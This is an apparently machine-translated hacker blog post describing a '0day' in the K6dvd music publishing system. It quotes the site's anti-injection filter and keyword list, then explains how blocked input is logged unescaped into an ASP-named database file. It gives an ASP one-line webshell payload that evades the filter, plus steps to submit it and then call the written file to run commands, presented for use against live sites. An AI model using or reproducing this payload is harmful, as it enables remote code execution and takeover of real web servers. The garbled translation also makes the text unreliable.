K6dvd Music Network 0day (injection prevention embarrassment)

I haven't read the code for a long time ~ I believe many predecessors have known this BUG before posting it !! Ps: although I have never found it, it may have been too long to pay attention to the network! Ah ~~

K6dvd is a good music publishing Management System in China!

Today, Yu asked me to publish some penetration articles for your discussion this week !~ This is a denial, because it has not been infiltrated for a while, so there is nothing to write! But I still randomly flipped through some sites to see if I can get some cainiao penetration articles...

Find a music publishing station! The URL is no longer intended for penetration ~ Oh!

If you submit a URL with parameters, the following result is returned:

Well, anti-injection system! Most people who are engaged in penetration should have seen it ~

Illegal operation! The system makes the following records:
Operation IP: xxx. xx
Operation Time: 19:33:47
Operation page:/yxplay. asp
Submission method: GET
Submit parameter: id
Data submission: 109446

Oh, I also made an IP record ~~

I tried some common penetration ideas at Will ~ It is not satisfactory because of the blockage of the anti-injection system! Therefore, I directly downloaded the music source code of the site to see if I could turn over the ODAY ~ So we have this article !!

Let's take a look at the injection prevention system, which exists in conn. asp and SQL. asp, as shown in the following section:

Dim dbkillSql, killSqlconn, connkillSql
DbkillSql = "data/# SQL. asp"
On Error Resume Next
Set killSqlconn = Server. CreateObject ("ADODB. Connection ")
ConnkillSql = "Provider = Microsoft. Jet. OLEDB.4.0; Data Source =" & Server. MapPath (dbkillSql)
KillSqlconn. Open connkillSql

A database connection is created!
-------- POST part ------------------
If Request. Form <> "" Then
For Each Fy_Post In Request. Form
For Fy_Xh = 0 To Ubound (Fy_Inf)
If Instr (LCase (Request. Form (Fy_Post), Fy_Inf (Fy_Xh) <> 0 Then
If WriteSql = True Then
KillSqlconn. execute ("insert into 9j455 (Sqlin_IP, SqlIn_Web, SqlIn_FS, SqlIn_CS, SqlIn_SJ) values (" & Request. serverVariables ("REMOTE_ADDR") & "," & Request. serverVariables ("URL") & ", POST," & Fy_Post & "," & replace (Request. form (Fy_Post ),"","")&")")
KillSqlconn. close
Set killSqlconn = Nothing
End If
Response. Write "<Script Language = JavaScript> alert (Happy audio/video entertainment network prompts you, please do not submit any illegal characters or parameters to this site to try to inject !); </Script>"
Response. Write "illegal operation! The system makes the following records: <br>"
Response. Write "Operation IP:" & Request. ServerVariables ("REMOTE_ADDR") & "<br>"
Response. Write "operation time:" & Now & "<br>"
Response. Write "Operation page:" & Request. ServerVariables ("URL") & "<br>"
Response. Write "submission method: POST <br>"
Response. Write "Submit parameters:" & Fy_Post & "<br>"
Response. Write "submit data:" & Request. Form (Fy_Post)
Response. End
End If

Well, this is the alert error message!

Take a closer look and find an interesting guy, killSqlconn. execute ("insert into 9j455 (Sqlin_IP, SqlIn_Web, SqlIn_FS, SqlIn_CS, SqlIn_SJ) values (" & Request. serverVariables ("REMOTE_ADDR") & "," & Request. serverVariables ("URL") & ", POST," & Fy_Post & "," & replace (Request. form (Fy_Post ),"","")&")")

This is a normal record of the IP and action types, as well as the content submitted by the injector !! Look at the above Server. CreateObject ("ADODB. Connection") database turned out to be ASP... Then, if we submit <% execute (request ("wooden") %>, won't we write a sentence to # SQL. asp? Don't be too happy. Let's look at it again:

Customize the string to be filtered, separated by "|"
Fy_In = "|; | and | exec | insert | select | delete | update | count | * | % | chr | mid | master | truncate | char | declare"

The keyword in the submit type is executed in the fy_in parameter! If these keywords appear in the submitted content, you cannot submit them to the database!

If you have learned regular expressions, this is not a problem for JavaScript masters. It has been changed over and over again! Finally, a Trojan that can skip all the above detection statements is born ~ It's just the pleasure of eval---No execute error!

<Script runat = server language = vbscript> eval request (chr (35) </script>



Method of exploits: and => <script runat = server language = vbscript> eval request (chr (35) </script>

Then access data/% 23sql. asp to execute a sentence: